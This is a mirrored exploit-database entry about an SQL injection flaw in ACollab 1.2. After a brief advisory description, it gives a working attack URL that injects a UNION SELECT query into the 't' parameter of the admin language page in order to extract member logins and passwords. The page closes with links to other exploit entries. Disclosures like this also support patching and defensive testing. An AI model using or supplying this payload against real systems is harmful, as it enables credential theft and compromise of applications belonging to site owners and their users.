ACollab – ‘t’ SQL Injection

Exploit Database
14 阅读

作者： AutoSec Tools

日期： 2011-02-01
类别：
- webapps
平台：
- php
来源：https://www.exploit-db.com/exploits/35305/

source: https://www.securityfocus.com/bid/46095/info

ACollab is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

ACollab 1.2 is vulnerable; other versions may also be affected. 

http://www.example.com/acollab/admin/lang.php?lang=&t=xxx'UNION%20SELECT%200,0,'error',GROUP_CONCAT(login,':',password),4%20FROM%20AC_members%20WHERE%20'a'='a

last Exploits
ACollab – ‘t’ SQL Injection的更多信息

COMMAX CVD-Axx DVR 5.1.4 – Weak Default Credentials Stream Disclosure：
WordPress Plugin Download Manager Free & Pro 2.5.8 – Persistent Cross-Site Scripting：
WordPress Plugin Metronet Tag Manager 1.2.7 – Cross-Site Request Forgery：
McAfee Email Gateway (formerly IronMail) – Cross-Site Scripting：
OpenCart Core 4.0.2.3 – ‘search’ SQLi：
iScripts easybiller 1.1 – SQL Injection：
Men Salon Management System 1.0 – SQL Injection Authentication Bypass：
Enigma NMS 65.0.0 – Cross-Site Request Forgery：